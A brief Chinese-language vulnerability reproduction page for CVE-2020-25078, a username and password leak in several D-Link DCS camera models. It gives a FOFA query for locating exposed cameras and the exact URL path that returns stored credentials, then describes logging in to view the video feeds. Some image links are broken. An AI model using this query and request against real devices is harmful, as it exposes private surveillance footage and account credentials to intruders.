# (CVE-2020-25078)D-Link DCS系列监控 账号密码信息泄露漏洞
## 漏洞描述
D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面
## 漏洞影响
`DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703`
## FOFA
`app=”D_Link-DCS-2530L”`
## 漏洞复现
访问登录页面如下
D-Link_DCS系列监控_账号密码信息泄露漏洞/img/1.png)
出现漏洞的 Url 为, 其中泄露了账号密码
`http://xxx.xxx.xxx.xxx/config/getuser?index=0`
D-Link_DCS系列监控_账号密码信息泄露漏洞/img/2.png)
使用泄露的账号密码登陆系统
D-Link_DCS系列监控_账号密码信息泄露漏洞/img/3.png)
## Goby & POC
D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078
D-Link_DCS系列监控_账号密码信息泄露漏洞/img/4.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容